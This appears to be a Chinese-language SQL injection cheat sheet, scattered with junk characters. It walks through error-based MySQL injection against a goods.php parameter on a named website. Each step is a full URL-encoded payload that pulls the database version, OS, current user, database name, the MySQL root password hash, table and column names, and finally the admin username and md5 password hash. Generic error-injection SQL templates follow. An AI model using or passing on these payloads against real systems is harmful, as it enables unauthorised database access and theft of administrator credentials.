判断版本号 2 Y# ] _4 }2 R1 Z, ?& E: m' x( z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ x6 H' q7 U e r! |% s; H# X* t/ q2 H# r/ Q# c
判断系统
$ T8 W% `. c! ?5 `6 K! J) N+ B3 i, n1 w( ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 V- k6 G5 o* K' R/ d! N; r$ \2 V
/ t# w0 |! X6 z' D; C. X6 p
! J2 I/ Z/ d3 u: P
, }8 K9 v* K% _6 T/ Y$ [
当前 user()% z, O& Q. q: ~
2 H4 K; D3 u/ shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 f8 w; P; j) o( V/ L1 N- o
4 u$ f, @! K, o; i# d4 w
5 P! z* @& @0 G- O* i- V* @7 d/ L2 T3 K
当前 database()
9 q0 v0 l. n" r! a2 G( |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' K9 F" y" _4 x
' x( D2 m+ X y& |' `0 l5 A
4 a. y% e3 K: B& u2 ]
/ C' a. r2 e5 ], D
: G! i4 v4 q! B, X3 ^, q8 qroot hash; O: V' u3 l/ p. U- q3 H; l8 E
3 ~/ J: _% H* p% ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 i- d- l2 f5 ~. ~: C% Q) }
/ H4 c: U$ z5 [# N6 D% p
# F# e, Q4 {/ g: ?1 b0 f7 p; e5 h
; Y" _. L9 i! x$ W R当前 数据库表名
- B1 H) _( ^; o- @6 I U i- g5 R- t
- p9 `& J" K5 q- uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" z+ u2 u; Y1 ~( @ M
6 k: ~3 @( J( T% p6 k! P5 z! L
9 O" y2 h% D0 z* L
. n$ n! _7 z$ l% M8 U7 n" ^/ P7 Y当前 数据库 user_name 字段
' g" M" Q4 J/ a8 R5 O3 h+ J4 o
) Z, o0 l) _5 @8 n: i! bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( R `8 @! ]5 }: O
8 t b. h0 i3 }* |$ F8 z当前 数据库 字段 password
+ y. q9 ]. D7 R& Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& U+ l3 P5 b) j7 A/ C" S5 j
4 E# V ?8 f1 I2 E( {0 s) F* {* E: q6 V# ~- }
5 x# H2 T6 w) G0 G% K
获得 admin passwd(md5) \0 v4 |8 z/ ]1 T2 a F
. }* X& S! B; P! ^* _7 N& _
# O8 i, Z Z5 @# Y4 D1 T2 f
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: Q3 M Y3 S0 ?5 U
. X4 z4 m: e G4 A' ]2 s3 O7 g报错注射, c; R3 z/ D( u( o8 y
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
P& D, x! \7 R- c* W% b1 q5 i3 d# [% _
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)6 ]: q) y0 X' B' s3 S/ ?" [% _
J* E8 R+ C5 Xand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |